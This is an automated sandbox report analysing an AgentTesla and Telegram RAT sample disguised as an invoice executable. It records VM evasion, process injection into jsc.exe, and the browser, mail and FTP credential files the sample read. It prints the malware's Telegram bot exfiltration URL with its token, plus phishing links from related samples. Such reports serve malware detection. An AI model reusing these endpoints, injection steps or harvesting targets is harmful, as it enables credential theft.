                      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: PO-inv-CQV20(92315).exe, -----.csReference to suspicious API methods: ((_0602_FBC6)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FDE7(_06EA._FDC8_FDEB_FDE5_06EA_06DC)), _FDE7(_06EA._FD44_0670_065B_061C_06EA)), typeof(_0602_FBC6)))("vpGUntmDH2Bs", out var _)
                      Source: PO-inv-CQV20(92315).exe, -----.csReference to suspicious API methods: ((_0602_FBC6)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FDE7(_06EA._FDC8_FDEB_FDE5_06EA_06DC)), _FDE7(_06EA._FD44_0670_065B_061C_06EA)), typeof(_0602_FBC6)))("vpGUntmDH2Bs", out var _)
                      Source: PO-inv-CQV20(92315).exe, -----.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FDEE_061E_FBD0_060D_06E4_FBB7_0657_FDD9_06D9)
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, Ljq6xD21ACX.csReference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 9B7008Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeQueries volume information: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		311
                      Process Injection                      		1
                      Masquerading                      		2
                      OS Credential Dumping                      		231
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		13
                      Virtualization/Sandbox Evasion                      		1
                      Input Capture                      		13
                      Virtualization/Sandbox Evasion                      		Remote Desktop Protocol1
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Disable or Modify Tools                      		1
                      Credentials in Registry                      		1
                      Process Discovery                      		SMB/Windows Admin Shares11
                      Archive Collected Data                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                      Process Injection                      		NTDS1
                      File and Directory Discovery                      		Distributed Component Object Model2
                      Data from Local System                      		3
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets24
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Timestomp                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO-inv-CQV20(92315).exe25%ReversingLabsWin64.Trojan.Generic
                      PO-inv-CQV20(92315).exe23%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.7.drfalse
                              		high
                              https://account.dyn.com/PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.orgjsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://api.telegram.orgjsc.exe, 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      149.154.167.220
                                      		api.telegram.orgUnited Kingdom
                                      		62041TELEGRAMRUfalse

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1431985
                                      Start date and time:2024-04-26 07:39:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 48s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:PO-inv-CQV20(92315).exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@7/5@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 89%
                                      • Number of executed functions: 84
                                      • Number of non-executed functions: 8
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      07:40:01API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      149.154.167.220o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                        UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                          Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                              17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                    X1.exeGet hashmaliciousXWormBrowse
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                        X2.exeGet hashmaliciousXWormBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          api.telegram.orgo3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 149.154.167.220
                                                          UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                          • 149.154.167.220
                                                          Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                          • 149.154.167.220
                                                          X1.exeGet hashmaliciousXWormBrowse
                                                          • 149.154.167.220
                                                          Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                          • 149.154.167.220

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUo3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 149.154.167.220
                                                          http://rfpteams.ksplastlc.netGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                          • 149.154.167.220
                                                          Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          X1.exeGet hashmaliciousXWormBrowse
                                                          • 149.154.167.220
                                                          Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                          • 149.154.167.220

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ea.cmdGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          http://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 149.154.167.220
                                                          https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                          • 149.154.167.220
                                                          http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                          • 149.154.167.220
                                                          Isass.exeGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                          • 149.154.167.220
                                                          SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 149.154.167.220
